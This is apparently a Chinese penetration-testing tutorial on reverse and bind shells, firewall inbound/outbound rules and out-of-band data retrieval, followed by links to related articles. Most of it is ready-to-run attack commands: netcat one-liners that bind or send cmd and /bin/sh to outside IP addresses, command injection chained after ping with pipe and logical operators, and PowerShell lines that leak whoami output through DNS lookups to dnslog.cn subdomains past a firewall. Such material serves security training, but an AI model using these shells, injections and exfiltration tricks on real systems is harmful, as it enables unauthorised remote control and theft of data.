基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

本文涉及的产品
云防火墙,500元 1000GB
简介: 基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载

常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138


实用案例1:文件上传下载-解决无图形化&解决数据传输

命令生成:https://forum.ywhack.com/bountytips.php?download

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等


实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

命令生成:https://forum.ywhack.com/shell.php

NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。


1、正向连接:本地监听等待对方连接

Linux控制Windows

//绑定CMD到本地5566端口

nc -e cmd -lvvp 5566

//主动连接目标5566

nc 10.10.10.1 5566


Windows控制Linux

//绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566

//主动连接目标5566

nc 10.10.10.1 5566

2、反向连接:主动给出去,对方监听

//绑定CMD到目标5566端口

ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上

//等待5566连接

nc -lvvp 5566


//绑定CMD到目标5566端口

nc -e cmd 10.10.10.146 5566 windows 反弹linux

//等待5566连接

ncat -lvvp 5566


实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

管道符| (管道符号 ) ||(逻辑或) &&(逻辑与) &(后台任务符号)


Windows->| & || &&


Linux->; | || & && ``(特有``和;)


例子:


ping -c 1 127.0.0.1 ; whoami

ping -c 1 127.0.0.1 | whoami

ping -c 1 127.0.0.1 || whoami

ping -c 1 127.0.0.1 & whoami

ping -c 1 127.0.0.1 && whoami

ping -c 1 127.0.0.1 `whoami`


判断windows


windows没有自带的nc


想办法上传nc 反弹权限


反弹


开启入站策略,采用反向连接


Linux:ncat -lvvp 5566


Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566


开启出站策略,采用正向连接


Linux:ncat -e cmd 47.122.23.131 5566


Windows:127.0.0.1 | nc -e cmd -lvvp 5566


正反向反弹案例-内网服务器


只能内网主动交出数据,反向连接


实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog

DNSLog Platform


出站入站都开启策略(数据不回显):OSI网络七层


ping 127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='5t4zre.dnslog.cn';$z=$x+$y;ping $z


有,但是数据不回显(开启了防火墙):

1、反弹shell

2、带外查询

为什么要这样写?

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量


结果带有“\” 导致ping无法执行


powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z


127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z


为什么开启防火墙后 whoami数据还是可以带外回显?

ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,

但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。


相关文章
|
1月前
|
Shell Linux Windows
nc简单反弹shell
该内容描述了在Windows和Linux环境中使用`nc`(Netcat)工具建立反弹shell的过程。在Windows上,反弹端通过命令`nc -e cmd IP 端口`将控制权反弹到指定IP;控制端则运行`nc -lvvp 端口`等待连接。在Linux环境下,类似地,使用`nc -l -v -p 端口`作为控制端,而被控端用`nc 目标IP 端口`进行连接。文中还包含相关截图以辅助说明。
38 0
|
1月前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 关闭PPP(Point-to-Point Protocol)连接 ppp-off命令 使用指南
【Shell 命令集合 网络通讯 】Linux 关闭PPP(Point-to-Point Protocol)连接 ppp-off命令 使用指南
64 1
|
1月前
|
监控 网络协议 Unix
Linux命令-nc(端口监控、文件传输、反弹shell等)
Linux命令-nc(端口监控、文件传输、反弹shell等)
216 0
|
1月前
|
监控 网络协议 Linux
【Shell 命令集合 网络通讯 】Linux 显示网络 连接、路由表和网络接口信息 netstat命令 使用指南
【Shell 命令集合 网络通讯 】Linux 显示网络 连接、路由表和网络接口信息 netstat命令 使用指南
112 1
|
8天前
|
安全 网络协议 Linux
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
|
1月前
|
运维 监控 Shell
利用Shell脚本编写局域网监控软件:实时监测主机连接情况
本文介绍了如何使用Shell脚本创建一个局域网监控工具,以实时检查主机连接状态。脚本包括扫描IP地址范围检测主机可达性及使用`netstat`监控ESTABLISHED连接。此外,还展示了如何每60秒将连接数数据自动提交到指定网站API,以便实时跟踪网络活动。这个自动化监控系统有助于提升网络安全性和故障排查效率。
137 0
|
1月前
|
Shell Linux C语言
【Shell 命令集合 文本处理工具】Linux 字段连接 join 命令使用指南
【Shell 命令集合 文本处理工具】Linux 字段连接 join 命令使用指南
46 1
|
1月前
|
监控 Shell Linux
【Shell 命令集合 系统管理 】Linux 启动和管理SLIP 连接 sliplogin命令 使用指南
【Shell 命令集合 系统管理 】Linux 启动和管理SLIP 连接 sliplogin命令 使用指南
40 0
|
1月前
|
监控 Shell Linux
【Shell 命令集合 网络通讯 】Linux 拨号连接 dip命令 使用指南
【Shell 命令集合 网络通讯 】Linux 拨号连接 dip命令 使用指南
65 0
|
1月前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 建立串行连接 cu命令 使用指南
【Shell 命令集合 网络通讯 】Linux 建立串行连接 cu命令 使用指南
32 0